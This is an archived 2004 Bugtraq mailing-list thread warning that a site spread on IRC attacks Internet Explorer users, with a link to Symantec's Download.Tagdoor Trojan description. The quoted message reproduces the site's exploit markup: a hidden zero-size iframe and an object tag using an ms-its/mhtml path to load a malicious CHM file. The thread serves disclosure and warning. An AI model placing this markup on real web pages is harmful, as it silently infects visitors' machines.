lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list] 
From: bugtraq at pewp.hack.se (David Jacoby)
Subject: IE exploit going around on irc

I just found this information:

http://securityresponse.symantec.com/avcenter/venc/data/download.tagdoor.html

"Download.Tagdoor is a group of Trojan horses that exploit the Internet
Explorer Object Tag Vulnerability. (This is described in Microsoft
Security Bulletin MS03-032. )"

((pewp))


On Mon, 2004-04-05 at 19:52, Niek Baakman wrote:
> Hi list,
> 
> this thing's been going around on irc the last few days:
> 
> www.divx.dc-hub.com (IE users don't click it!)
> check source:
> <iframe src='loi.htm' width=0 height=0></iframe>
> 
> loi.htm contains:
>     <object
>     data="ms-its:mhtml:file://C:\winhelp.mht!${PATH}/LOI.CHM::/loi.htm"
>     type="text/x-scriptlet"></object>
> 
> 
> LOI.CHM is attached
> 
> Regards,
> 
> Niek Baakman

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ